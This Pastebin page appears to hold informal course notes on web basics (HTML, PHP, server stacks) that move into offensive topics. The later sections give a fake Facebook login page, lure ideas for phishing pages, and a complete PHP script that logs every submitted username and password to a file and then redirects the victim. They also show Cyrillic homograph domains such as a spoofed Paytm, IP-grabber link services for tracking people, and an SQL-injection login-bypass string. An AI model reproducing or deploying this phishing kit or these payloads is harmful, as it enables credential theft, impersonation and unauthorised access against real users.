Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- WebTechnologies And Basic Components
- ------------------------------------
- 1. Domain Name
- 2. Hosting
- 3. Server
- 4. Database
- 5. Technologies ----> HTML, PHP, JAVASCRIPT
- --->Domin Name----> It is the name of the website that we purchase from domin name provider ----> godaddy.com, wix, 000webhost
- --->Hosting -----> Place where i keep the content of my website
- --->Servers ----> They help in processing the request and give me response
- --->Database ----> are the backbone of the web technologies.... these are used to store data in the form of tables anb columns
- Technologies
- ------------
- programming and other tools which are used for building my web site
- php, HTML, Javascript, css, angularJS, asp .net
- webpage ---> collection of hyperlinks and hypertext
- website ---> collection of different web pages
- Security
- --------
- 1. ssl sertificate ---> HTTPS ---> Secure Socket Layer
- 2. Firewall ----> filter---> malicious data
- 3. IPS and IDS ----> attacker se bachati hai
- IPS = Intrusion Prevention Service
- IDS = Intrusion Detection Service
- hello---> plain text
- algo ---> encrypt ---> secret language
- kijui----> cipher text ----> secret text
- algo ----> decryption ---> secret text ko plain text
- hello-----> plain text
- Misconception
- -------------
- 1. HTTPS will not save you
- 2. Firewall can be easily bypass
- 3. All anti-malware can be evaded
- Servers ---> Responsible for request and response
- -------
- 1. Microsoft servers ----> IIS + Apache + MSSQL ---> Paid
- 2. Linux Server ---> Apache + Tomcat + MySQL,SQL ---> Both, paid and open source as well
- Windows based server ----> WAMPP
- W ---> Windows
- A ---> Apache
- M ---> MySQL
- P ---> Perl
- P ---> php
- Linux Based server ---> LAMPP
- L ---> Linux
- A ---> Apache
- M ---> MySQL
- P ---> perl
- P ---> PHP
- Mughe nahi pta k konsa OS h ---> XAMPP
- X ---> Cross Platform ---> portable software server
- A ---> Apache
- M ---> MySQL
- P ---> perl
- P ---> PHP
- HTML
- ----
- HyperText Markup Language
- <>--->tags ----> markup
- 1. <html>****</html> ----> it defines that my whole syntax is of HTML ---> each and every content of the webpage is written between this tag
- 2. <head>****</head> ----> it defines the header of the webpage
- 3. <title>***</title> ---> it gives the name in the tab --> always under head tag
- 4. <body>***</body>---> it define the whole content of the body---> ye head tag se bahar chalta h
- 5. <p>paragraph</p> ----> it defines a paragraph in the web page
- 6. <br> ---> it gives a new line to my web page.
- 7. <h>****</h> ----> It is used for providing a heading to my webpage content
- 8. <img src=""> ---> to insert an image into a web page
- 9. <a href=""> ----> me apne data ko link provide kr rha hu
- 10. <form>*****</form> ---> it will create a login type form
- <input> ---> different elements
- first.html
- <html>
- <head>
- <title>First Page</title>
- </head>
- <body>
- <a href="https://www.google.com/search?q=dragon+ball+z&client=ubuntu&channel=fs&tbm=isch&source=lnms&sa=X&ved=0ahUKEwjB-IXQ-vvVAhVLIlAKHXznCnYQ_AUICygC&biw=1309&bih=671&dpr=1">
- <h1>Dragon Ball Z</h1>
- </a>
- <a href="https://www.google.com/search?client=ubuntu&channel=fs&biw=1309&bih=671&tbm=isch&sa=1&q=lucifer+&oq=lucifer+&gs_l=psy-ab.3..0i67k1j0l2j0i67k1.31225.32550.0.33264.8.8.0.0.0.0.518.1123.2-1j1j0j1.3.0....0...1.1.64.psy-ab..5.3.1120.9VRWyWn6WqQ">
- <p>Hello, everyone.<br> This is my first web page.<br> My name is Lucifer Morning Star.</p>
- </a>
- <a href="https://www.google.com/search?q=goku&client=ubuntu&channel=fs&source=lnms&tbm=isch&sa=X&ved=0ahUKEwjUxf3B-fvVAhUPU1AKHeNSD0YQ_AUICigB&biw=1309&bih=671"><img src="/home/avi_lucifer/Desktop/goku_by_bpsola-d6j32pk.jpg">
- </a>
- <p>Login Via Facebook Account</p>
- <form action="second.html" method="get">
- username : <input type="text"><br> <br>
- password : <input type="password"><br> <br>
- <input type="submit" onClick="second.html">
- </form>
- </body>
- </html>
- second.html
- <html>
- <head>
- <title>Second Page</title>
- </head>
- <body>
- <p> Welcome to the fake facebook</p>
- </body>
- </html>
- php----> Hypertext preprocessor
- -------------------------------
- Basics of PHP
- ------------------
- PHP is a server side language, which is used to create dynamic website.
- PHP variables → they are temporary memory location which holds input data.
- Variable name should start with $ sign.
- After $ sign, there is a alphabet [a-z][A-Z] or underscore(_)
- After that there will be a combination of alphanumeric character and underscore.
- Eg. $uname = “Abhijeet”
- $s_salary = 30000
- PHP operators → they are use to manipulate data and variables.
- Arithmatic operator
- + → addition → $a + $b
- - → subtraction → $a - $b
- / → division → $a / $b → quotent
- * → multiplication → $a * $b
- % → modulus → $a % $b → remainder
- Assignment Operator
- = → asign the value → $a = 10
- += → $a += $b → $a = $a + $b
- -= → $a -= $b → $a = $a - $b
- *= → $a *= $b → $a = $a * $b
- /= → $a /= $b → $a = $a / $b
- %= → $a %= $b → $a = $a % $b
- Relational & Comparision Operator
- > → $a > $b
- < → $a < $b
- >= → $a >= $b
- <= → $a <= $b
- == → $a == $b
- != → $a != $b
- Logical Operator
- AND (&&) → when all the conditions are true, then the answer will be true.
- OR (||) →when any one of the condition is true then the answer is true.
- NOT (!) → It will reverse the value… true to false and false to true.
- PROGRAM
- ----------------
- <?php
- $a = 10;
- $b = 20;
- $sum = $a + $b;
- echo “The sum is ”.$sum;
- ?>
- PHP Conditional Statement → they always return some boolean value… either true or false.
- If | Else
- if($a > $b)
- {
- echo “A ig greater”;
- }
- else
- {
- echo “B is greater”;
- }
- If else if else
- if($a>$b && $a>$c)
- {
- echo “A ig greater”;
- }
- else if ($b>$a && $b>$c)
- {
- echo “B is greater”;
- }
- else
- {
- echo “C is greater”;
- }
- Nested If Else
- <?php
- $age = 27;
- $gend = “Male”;
- if ($age > 25)
- {
- if($gend == “Male”)
- {
- echo “Eligible”;
- }
- else
- {
- echo “Not eligible”;
- }
- }
- else
- {
- echo “Age is not 25 yet”;
- }
- ?>
- PHP Loops → Looping is a process for executing multiple statements at a single line or repetition of statement.
- For Loop → in this loop first condition is check and then executed. It needs three things for starting this loop → initialization, condition, iteration.
- for(initialization; condition; iteration)
- {
- Statements;
- }
- for($i = 1; $i < 10; $i++)
- {
- echo “likho <br>”;
- }
- While Loop → condition is check in the start. Return boolean value.
- while(condition)
- {
- Statements;
- Iteration;
- }
- while($num < 5)
- {
- echo num;
- }
- PHP Form → it is something like having textbox, labels, radio buttons, check buttons, submit buttons. Wherever you can see any query form, login form, feedback form, they all use PHP form
- Textbox
- Password
- Radiobutton
- Checkbox
- List|Menu
- Textarea
- Filefield
- Submit button
- Reset
- Normal Button
- PHP GET|POST→
- GET → unsecure method, because it display the form field values in the url. Uses upto 1mb. Fast process.
- POST → It is secure method. Large amount of data can be send. It is a slow process.
- tracing and tracking
- --------------------
- tracing---> terrorist--mail--PM
- me tumhare ghar m bomb lga k bhag jaunga
- who send it---- from where he send it
- tracking---> pm ne report kri... kaha se kb and kisne bheji
- fuglikous.com
- whoreadme.com
- user agent---> browsers that the person is using for surfing the internet
- VAPT
- ---
- V = Vulnerability
- A = Accessment
- P = Penetratino
- T = Testing
- VA+PT
- VA--> we generate a report on the loopholes and weekpoint... from where we can get access of the machine or device----> vulnerabilities, loopholes, weekpoints---> not hack only report generate
- PT--> Penetration Testing--> we hack into the systems and exploit them as per the VA report--> it is purely hacking
- owasp top 10
- ------------
- open web application security project
- DBMS---> Data Base Management System
- database is the backbone of any website or server where my data is stored in the form of tables and column
- SQL---> Structured Querry Language
- it is a querry language via which i can fetch the data from the databse from a specific table and a specific column---> jo mughe chahiye vhi me leke rahunga
- Select trains from train_Database where source="Delhi" destication="mumbai" date="7september" class="3AC"
- DVWA--> Damm Vulnerable Web Application
- its a firmware/application which is used to check the skill of PT of a candidate
- when ever i create my device as a server---- i access the server from localhost or loopback address which is 127.0.0.1
- localhost
- varchar==> variable + character---> House number G-33, street Number &
- select, insert, update, delete, and, or
- sql injection--->
- Phishing
- --------
- FIsh----> we will give chara to the people and hack their data
- PHISHING ---> It is a process of creating a fake web page and by that web page we can get the user's credentials....
- How To Deploy It
- ----------------
- We will create an account
- HTML, css, js.....
- Game Of Throne download page
- adult worker
- paytm recharge code
- discount coupans
- ola cabs free share pass
- uthaLo.php
- <?php -----> it is a php file and php script
- header ('Location: http://www.facebook.com'); ----> jb mera php script ka kaam khtm ho jayega tb me user ko is site p chod dunga
- $handle = fopen("log.txt", "a"); ------> fire create kr rha hu
- foreach($_POST as $variable => $value) ---> getting all the data in a loop
- {
- fwrite($handle, $variable); ---> 1 variable
- fwrite($handle, "="); ----> = 2
- fwrite($handle, $value); ----> data write 3
- fwrite($handle, "\r\n"); ---->4 new line
- }
- fwrite($handle, "\r\n"); --> to write a new line
- fclose($handle); ---> close krdo...log.txt
- exit; ----> kaam khtm.... location p le jao user ko
- ?> ---> end of php
- $handle ---> variable name
- fopen ---> to open a file
- Attribute in file
- r ---> read --> sirf and sirf read kr sakta hu
- w ---> write --> i will create a new file, if name does not exist... else it will overwrite the old file
- a ---> append ---> it work just like write but it never deletes or over write the file but it will continue writing in the same file
- username=sdxjkchvs@gmail.com
- password=liadsjkvcabl
- IDN Homography Attack
- ---------------------
- IDN --> Internationalized Domain Name
- India has many languages..... hindi and punjabi.....
- World has many languages----> crylic, greek, arabic, english.......
- Many alphabets have same representation as that of english characters
- The Russian letters а, с, е, о, р, х and у
- identical to a, c, e, o, p, x and y.
- d
- dеерikа раdukоnе
- рауtm.com
- Ek mail aaya.... you will be dead in the evening--->
- i will find from where this email has been send-----> tracing
- now i will reply the person with a mail.... and by that mail i will try to find the person or try to gather the information ----> tracking
- grabify ---> https://grabify.link/
- fuglekus ---> www.fuglekos.com/ip-grabber
- mage [goku.jpg] successfully uploaded!
- Folder name [2017-8-30]
- Your image 'goku.jpg'
- in folder '2017-8-30' has been uploaded.
- whoreadme----> tracking
- Plain Text ----> Hello
- Ciphers ---> encrypting my messages....----> aheel ----> key ---> mail
- key ----> decrypt
- Authentication Bypass
- -----------------------
- I will log in as the administrator and can have what ever i want to have...
- GATES ----> AND, OR
- AND ---> if my any of the value is 0 then my answer will be 0
- A AND B ANS
- 0 0 0
- 0 1 0
- 1 0 0
- 1 1 1
- OR ---> If any of the value is 1 then answer will be 1
- A OR B ANS
- 0 0 0
- 0 1 1
- 1 0 1
- 1 1 1
- admin 'and' 1'or'1'='1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement